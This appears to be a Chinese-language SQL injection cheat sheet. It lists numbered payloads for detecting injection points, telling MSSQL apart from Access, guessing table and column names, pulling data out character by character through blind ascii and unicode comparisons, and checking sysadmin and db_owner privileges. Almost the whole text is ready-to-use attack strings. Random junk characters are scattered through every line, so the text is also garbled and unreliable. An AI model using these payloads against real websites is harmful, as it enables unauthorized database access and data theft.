1.判断是否有注入;and 1=1 ;and 1=2 {"|P
2.初步判断是否是mssql ;and user>0 6[fp e
mYLqT$t.+
3.注入参数是字符'and [查询条件] and ''=' `B6~KZ
l_tr,3_w
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2Zt :]be
e~]3/ 0
5.判断数据库系统 Za68V/Vj
y)iT-$bQ
;and (select count(*) from sysobjects)>0 mssql $D{KXkrd
+-tvNX%IJ
;and (select count(*) from msysobjects)>0 access .^6;_s>FN
a+A^njk
!$&k@#v:
K=,nX7Z5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 'z$ BgXh\
u[nx?!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 xCU^4DO3p
i#Tm] ++
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 A&EVzmj-+X
DM
{r<?V
9.(1)猜字段的ascii值(access) sf{rs*bgp
NA%M)u{|
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 l&3f<e
NIZN}DnP
(2)猜字段的ascii值(mssql) %Jy0?W N
h^_Sd"l3
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ~2
L{m[s|
`4^-@}
10.测试权限结构(mssql) E"d\N-I
_<tWy+.
:|cC7,S
"|P8L|
@*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- irj{Or^k
g/Q"%GN,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- G.v zz-yG
_,*ld#'s
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- P$LHsg]
o,o,(sII
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 9G njJ
nx{_^sK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- _$s ;QI]x
*12,MO>go
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -|E|-'
mZGAl1`8
;and 1=(select IS_MEMBER('db_owner'));-- 5G5P#<Vv
!6y<